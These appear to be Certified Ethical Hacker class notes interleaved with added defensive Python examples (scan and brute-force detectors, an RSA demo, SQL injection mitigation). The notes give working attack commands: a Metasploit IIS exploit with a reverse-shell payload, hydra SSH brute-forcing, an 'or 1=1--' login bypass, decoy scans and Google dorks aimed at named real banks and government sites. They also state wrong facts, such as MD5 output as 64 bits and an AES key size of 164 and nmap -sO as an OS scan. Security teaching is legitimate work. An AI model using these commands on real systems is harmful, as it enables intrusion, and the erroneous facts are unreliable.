Ceh

The document outlines various concepts and tools related to ethical hacking, including commands in Linux, network scanning techniques using Nmap, and methods for gaining access through vulnerabilities. It discusses cryptography, hashing algorithms, and digital signatures, as well as tools for password cracking and SQL injection. Additionally, it covers session hijacking, buffer overflow, and the importance of security elements like confidentiality, integrity, and authenticity.

Uploaded by Ami Stranger

CEH:

Class 1: The yes command in Linux: yes > /root/Desktop/test.txt ...


?? Where is the ls command located? Why doesn't ls show up in the process list?

An exploit is the agent; the original content is called the payload.

A threat is an event by which your system can be hampered.


A vulnerability is a weakness of that machine.

Security Elements: Confidentiality, Integrity, and Availability


Integrity: If any change happens in the system, the change should be detectable.

Authenticity, Non-Repudiation
Authenticity: Both systems must know who wants to log in and where he wants to log in.
Non-Repudiation: No one can deny that he did it.

GPL: GNU Public License ... the free license under which what we are using is released.

Phase-1:
Reconnaissance: Footprinting

3D traceroute
path analyzer

cd /pentest/enumeration/dns/dnsenum
./dnsenum.pl robi.com.bd


./forcepl

google hack database


operators:
site:thecitybank.com
site:thecitybank.com -nrbms.thecitybank.com ------ the same output can be obtained from:
cd /pentest/enumeration/google/goohost
./goohost.sh -t thecitybank.com -m ip -p 20 -v
dnsrecon in BackTrack

in google: thecitybank.com filetype:pdf

thecitybank.com filetype:pdf “ facebook secret”


.gov.bd inurl:login.php
inurl:adminlogin.php

GHDB --- Google Hacking Database

Network Scanning:
3-way handshake
Wireshark: Reset (RST) ACK if the port is closed.

Half open connection. Stealth scan.

nmap -sS -p 80 <dst ip>  --- s = send, S = SYN packet (use ip.dst==192.168.135.131 as a filter in Wireshark)

nmap -sO <dst ip> (s for scan, O for operating system)
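The half-open (stealth) pattern described above is also what a defender looks for in a capture: a client sends SYN, the target answers SYN/ACK (open) or RST/ACK (closed), and the client never sends the final ACK. The following is an added example, not part of the class notes, that applies that rule to a constructed list of packet summaries (the tuples stand in for what Wireshark would show; the IP addresses and ports are made up for the demo):

```python
from collections import defaultdict

# Constructed packet summaries standing in for a Wireshark capture (not real traffic).
# Each tuple is (src_ip, src_port, dst_ip, dst_port, tcp_flags); flags use S, A, R.
SAMPLE_PACKETS = [
    # A normal client: SYN, SYN/ACK, ACK completes the 3-way handshake to port 80.
    ("10.0.0.5", 40001, "192.168.135.131", 80, "S"),
    ("192.168.135.131", 80, "10.0.0.5", 40001, "SA"),
    ("10.0.0.5", 40001, "192.168.135.131", 80, "A"),
    # A half-open scanner: on open ports it answers SYN/ACK with RST instead of ACK,
    # and closed ports answer its SYN with RST/ACK.
    ("10.0.0.9", 50001, "192.168.135.131", 22, "S"),
    ("192.168.135.131", 22, "10.0.0.9", 50001, "SA"),
    ("10.0.0.9", 50001, "192.168.135.131", 22, "R"),
    ("10.0.0.9", 50002, "192.168.135.131", 80, "S"),
    ("192.168.135.131", 80, "10.0.0.9", 50002, "SA"),
    ("10.0.0.9", 50002, "192.168.135.131", 80, "R"),
    ("10.0.0.9", 50003, "192.168.135.131", 443, "S"),
    ("192.168.135.131", 443, "10.0.0.9", 50003, "RA"),
    ("10.0.0.9", 50004, "192.168.135.131", 8080, "S"),
    ("192.168.135.131", 8080, "10.0.0.9", 50004, "RA"),
]


def track_handshakes(packets):
    """Group packets into flows keyed by (client_ip, client_port, server_ip, server_port)
    and record which handshake steps each flow reached."""
    flows = {}
    for src, sport, dst, dport, flags in packets:
        if "S" in flags and "A" not in flags:
            # A bare SYN opens a new flow; the sender is the client.
            flows[(src, sport, dst, dport)] = {"synack": False, "ack": False, "rst": False}
            continue
        forward, reverse = (src, sport, dst, dport), (dst, dport, src, sport)
        key = forward if forward in flows else reverse if reverse in flows else None
        if key is None:
            continue  # packet belongs to no flow we saw open
        state = flows[key]
        if key == reverse and "S" in flags and "A" in flags:
            state["synack"] = True          # server accepted: port is open
        elif key == forward and flags == "A":
            state["ack"] = True             # client completed the handshake
        if "R" in flags:
            state["rst"] = True             # either side tore the flow down
    return flows


def half_open_flows(flows):
    """A SYN was sent, the client never sent the final ACK, and the flow ended in RST:
    the half-open pattern whether the port was open (SYN/ACK then RST) or closed."""
    return [key for key, state in flows.items() if not state["ack"] and state["rst"]]


def find_syn_scanners(packets, min_ports=3):
    """Return {client_ip: sorted ports} for clients that half-open-probed >= min_ports ports."""
    probed = defaultdict(set)
    for client, _, server, port in half_open_flows(track_handshakes(packets)):
        probed[client].add((server, port))
    return {ip: sorted(port for _, port in targets)
            for ip, targets in probed.items() if len(targets) >= min_ports}


if __name__ == "__main__":
    print(find_syn_scanners(SAMPLE_PACKETS))   # {'10.0.0.9': [22, 80, 443, 8080]}
```

The threshold of three distinct ports is an arbitrary demo value; in practice it is tuned against the normal connection-failure rate of the network, and a real implementation would read flows from a pcap rather than a hand-written list.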

CEH class-2:

nmap -T(1,2,3,4,5) x.x.x.x (1 = per 5 mins, 2 = per 1 min, 3 = .5 mins, 4 = .75 mins, 5 = 200 packets per sec)

nmap -sV -sS

Nmap scripting engine located in /usr/local/share/nmap/scripts/


nmap -sS --script scriptname.nse

Enumerate SMB with nmap script:

nslookup
> set type=PTR
> x.x.x.x

#!/bin/bash
# Reverse-lookup every address in a /24: enter the first three octets (e.g. 192.168.1)
echo "please enter the network range"
read range
for ip in $(seq 1 254)
do
    host $range.$ip
done

Gaining access:
Vulnerability:
VS
1. Specific
2. Detail (Tools : Nexpose, Nessus, GFI Lan Guard)
www.nessus.org
Exploiting (Metasploit, Core Impact)

Exploit
Payload
RHOST
RPORT
LHOST
cd /pentest/exploits/framework2
./msfconsole
/pentest/exploits/framework2/exploit/

msf> use iis50_webdav_ntdll (press enter)


set RHOST remote ip
set RPORT 80
set LHOST local ip
set payload win32_reverse
exploit

Ophcrack is used to recover the password from the hash value.

Add an extra value in password hash

=rand (20,10)
www.eicar.org for dummy virus.
Steganography is a tool to hide something (Merge Streams, Glue)

C:\ shahadat.txt:Test.txt hide


ADS –Alternate Data System
To protect against this mechanism, use a drive formatted as FAT32.

SET:
/pentest/exploits/set ./set
url shortener

===================
Class 3:
ICMP packets contain 48 bytes of arbitrary value.
With a fuzzer you can perform an application-level flood attack.
Burp Suite is a proxy server.

LOIC, Ddoshttp for http flooding

Session Hijacking:
cd /proc/PID/sessionID: this folder contains all session IDs for that process.
How to see whether the session ID is encrypted or not?

Scapy Packet crafting tool


Droidsheep, Firesheep

Need to know how to analyze the session ID.


How to check whether open relay is enabled or not on a mail server.

Configure Tripwire and a honeypot


wireshark &
Show packet fragmentation on wireshark

nmap -py -f <dst ip>


nmap -f -p 80 --mtu=16 <dst ip>

nmap -D 192.168.198.130,ME -p 80 192.168.198.132

132 is the target IP.

nmap -p 80 --packet-trace --ip-options "L 192.168.198.1" www.google.com


This is called source routing.

=====================================================

Cryptography :

Method-1: The sender encrypts the document with his private key and the receiver
decrypts the document with the sender's public key.

Method-2: The sender encrypts the document with the receiver's public key and
the receiver decrypts it with the receiver's private key.

Final Method: First encrypt the document with the sender's private key; the sender then
has a cipher text, and encrypts that cipher text with the receiver's public key.

Hash Function:

AES and DES are symmetric key encryption, and Rijndael and DEA are the
algorithms.
AES is an implementation of the Rijndael algorithm.

AES Block size is 128 with key size 128,164,192


DES block size is 64 with key size 64, effectively 56.
MD5, SHA-1, SHA-2, SHA-3 are the hashing algorithms.

Every object has a different hash value.


Hash output is always the same size.
MD5 Output size 64
SHA-1 output size 128
SHA-2 output size 256
SHA-3 output size 512

Encryption (DES, AES, RC)
Hashing (MD5, SHA)
The above two together make a digital signature.
A digital signature confirms the following four things:
Confidentiality
Integrity
Senders Auth
Non repudiation
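To make the three methods above and the "hash, then apply the private key" construction of a digital signature concrete, here is an added example (not from the class notes) using textbook RSA with keys generated on the fly. Everything in it is an assumption for the demo: the key sizes (512-bit sender key, a larger 768-bit receiver key so the signed value always fits under the receiver's modulus), the sample document, and the use of raw RSA without padding, which real systems never do (they use OAEP for encryption and PSS or PKCS#1 v1.5 for signatures). digest_bits() reports the output sizes that Python's hashlib actually produces for the hash functions named in the notes.

```python
import hashlib
import random


def is_probable_prime(n, rounds=20):
    """Miller-Rabin probabilistic primality test."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def random_prime(bits):
    """Random odd number of exactly `bits` bits that passes Miller-Rabin."""
    while True:
        candidate = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(candidate):
            return candidate


def keygen(bits):
    """Return (public_key, private_key) as (n, e), (n, d) for a modulus of about `bits` bits."""
    e = 65537
    while True:
        p, q = random_prime(bits // 2), random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return (p * q, e), (p * q, pow(e, -1, phi))


def apply_key(value, key):
    """Raw RSA: value^exponent mod n. The same operation serves both key halves."""
    n, exponent = key
    assert 0 <= value < n, "value must be smaller than the modulus"
    return pow(value, exponent, n)


def method_1(doc, sender_priv, sender_pub):
    """Sender's private key, undone by the sender's public key: proves origin, no secrecy."""
    cipher = apply_key(int.from_bytes(doc, "big"), sender_priv)
    return apply_key(cipher, sender_pub).to_bytes(len(doc), "big")


def method_2(doc, receiver_pub, receiver_priv):
    """Receiver's public key, undone by the receiver's private key: secrecy, no proof of origin."""
    cipher = apply_key(int.from_bytes(doc, "big"), receiver_pub)
    return apply_key(cipher, receiver_priv).to_bytes(len(doc), "big")


def final_method(doc, sender_priv, sender_pub, receiver_pub, receiver_priv):
    """Sender's private key first, then the receiver's public key; the receiver reverses both."""
    inner = apply_key(int.from_bytes(doc, "big"), sender_priv)   # smaller than sender's n
    outer = apply_key(inner, receiver_pub)                         # needs receiver's n > sender's n
    recovered_inner = apply_key(outer, receiver_priv)
    return apply_key(recovered_inner, sender_pub).to_bytes(len(doc), "big")


def sign(doc, sender_priv):
    """Digital signature: hash the document, then apply the sender's private key to the digest."""
    return apply_key(int.from_bytes(hashlib.sha256(doc).digest(), "big"), sender_priv)


def verify(doc, signature, sender_pub):
    """Recover the digest with the public key and compare it to a fresh hash of the document."""
    return apply_key(signature, sender_pub) == int.from_bytes(hashlib.sha256(doc).digest(), "big")


def digest_bits():
    """Output sizes in bits as hashlib reports them."""
    return {name: hashlib.new(name).digest_size * 8 for name in ("md5", "sha1", "sha256", "sha3_512")}


def demo():
    sender_pub, sender_priv = keygen(512)
    receiver_pub, receiver_priv = keygen(768)       # demo assumption: larger than the sender's key
    doc = b"transfer 100 to account 42"             # constructed sample document
    signature = sign(doc, sender_priv)
    return {
        "method_1": method_1(doc, sender_priv, sender_pub) == doc,
        "method_2": method_2(doc, receiver_pub, receiver_priv) == doc,
        "final_method": final_method(doc, sender_priv, sender_pub, receiver_pub, receiver_priv) == doc,
        "signature_valid": verify(doc, signature, sender_pub),
        "tampered_rejected": not verify(b"transfer 900 to account 42", signature, sender_pub),
    }


if __name__ == "__main__":
    print(demo(), digest_bits())
```

Two things the run makes visible: Method-1 alone gives authenticity but not confidentiality, because anyone holding the sender's public key can undo it, which is why the notes' Final Method adds the receiver's public key on the outside; and the signature is over the hash, not the document, so a one-character change to the document produces a different digest and the check fails.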

Tamper Data is a proxy tool.

Buffer Overflow:

Buffer allocation in memory:

Arg (initial value for any function)
Stack (executable function)
Heap
Values
Variables
Code

Stack Table:
Arg (initial value for any function)
Value
Variable
Return Address (after executing the defined function)
Code like printf

After executing such a program you get back the following error:

Segmentation fault

When the variable value gets extra data (overflows), the microprocessor sends the extra value to
EIP (Instruction Pointer).

A debugger tool is used to see microprocessor usage.

==========================================================
index.of
medusa and hydra are password cracking tools
hydra -l root -P "passwordfile.txt" "ip address" ssh
hydra -L userlist.txt -P "passwordfile.txt" "ip address" ssh
acunetix, foca
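From the defending side, the hydra runs above leave a very recognisable trace in the SSH server's log: many "Failed password" lines from one source address in a short time, often across many usernames (the -L userlist form). The following added example, not part of the notes, parses constructed sshd log lines in the standard syslog format and flags a source that exceeds a failure threshold inside a sliding window; the hostnames, addresses and thresholds are made up for the demo.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log lines in syslog format (not from a real host).
SAMPLE_LOG = """\
Jan 10 12:00:01 web1 sshd[2201]: Failed password for root from 10.0.0.9 port 51000 ssh2
Jan 10 12:00:02 web1 sshd[2203]: Failed password for root from 10.0.0.9 port 51001 ssh2
Jan 10 12:00:02 web1 sshd[2205]: Failed password for invalid user admin from 10.0.0.9 port 51002 ssh2
Jan 10 12:00:03 web1 sshd[2207]: Failed password for invalid user oracle from 10.0.0.9 port 51003 ssh2
Jan 10 12:00:04 web1 sshd[2209]: Failed password for root from 10.0.0.9 port 51004 ssh2
Jan 10 12:00:05 web1 sshd[2211]: Accepted publickey for deploy from 10.0.0.5 port 40022 ssh2
Jan 10 12:03:10 web1 sshd[2230]: Failed password for alice from 10.0.0.7 port 42000 ssh2
Jan 10 12:09:30 web1 sshd[2260]: Failed password for alice from 10.0.0.7 port 42001 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_failures(text, year=2024):
    """Return (timestamp, username, source_ip) for every failed-password line.
    Syslog lines carry no year, so one is supplied (assumed 2024 for the sample)."""
    found = []
    for line in text.splitlines():
        match = FAILED_RE.match(line)
        if match:
            ts = datetime.strptime(f"{year} {match['ts']}", "%Y %b %d %H:%M:%S")
            found.append((ts, match["user"], match["ip"]))
    return found


def detect_bruteforce(text, window_seconds=60, max_failures=4):
    """Flag any source IP with at least max_failures failed logins inside a sliding window.
    The usernames tried are reported too: many distinct names from one IP is the -L pattern."""
    recent = defaultdict(deque)      # ip -> timestamps still inside the window
    usernames = defaultdict(set)
    alerts = {}
    for ts, user, ip in parse_failures(text):
        window = recent[ip]
        window.append(ts)
        usernames[ip].add(user)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()         # drop failures older than the window
        if len(window) >= max_failures:
            alerts[ip] = {"failures_in_window": len(window),
                          "usernames": sorted(usernames[ip])}
    return alerts


if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

In the sample, 10.0.0.9 produces five failures in four seconds across three usernames and is flagged; 10.0.0.7's two failures six minutes apart look like a user mistyping a password and are not. The same logic is what tools like fail2ban apply before adding a firewall rule.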

SQL INjection:
In the user name and password field use a single quote; if you get a database error
then it supports SQL injection.
Sqlmap and SQL Inject Me are tools to use for SQL injection.

" or 1=1--"
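The single-quote test and the 1=1 payload from the notes both work for the same reason: the application pastes user input into the SQL text. The following added example (not from the notes) puts a login check written that way next to the parameterised version, against a constructed in-memory SQLite table with one made-up user, and runs both probes against each. The payload is written with a single quote because the query's string literals are single-quoted.

```python
import sqlite3


def make_db():
    """Constructed sample database with a single user row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse battery')")
    return conn


def login_vulnerable(conn, username, password):
    """User input becomes part of the SQL text, so quotes and comments rewrite the query."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterised query: the driver passes the values separately, never as SQL text."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def single_quote_probe_errors(conn, login):
    """The notes' test: does a lone single quote in the username raise a database error?"""
    try:
        login(conn, "'", "x")
    except sqlite3.OperationalError:
        return True
    return False


def demo():
    conn = make_db()
    bypass = "' or 1=1--"    # the notes' payload, used in the password field
    return {
        "vulnerable_error_on_quote": single_quote_probe_errors(conn, login_vulnerable),
        "safe_error_on_quote": single_quote_probe_errors(conn, login_safe),
        "vulnerable_bypassed": login_vulnerable(conn, "alice", bypass),
        "safe_bypassed": login_safe(conn, "alice", bypass),
        "safe_real_login": login_safe(conn, "alice", "correct horse battery"),
    }


if __name__ == "__main__":
    print(demo())
```

With string concatenation the WHERE clause becomes username = 'alice' AND password = '' or 1=1--', which is true for every row, so the login succeeds without a password; the parameterised version compares the password column against the literal text of the payload, finds no row, and returns False, and the lone quote produces no error at all because it is never parsed as SQL.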

winrtgen is the rainbow table generator.

Medusa is another password cracking tool.
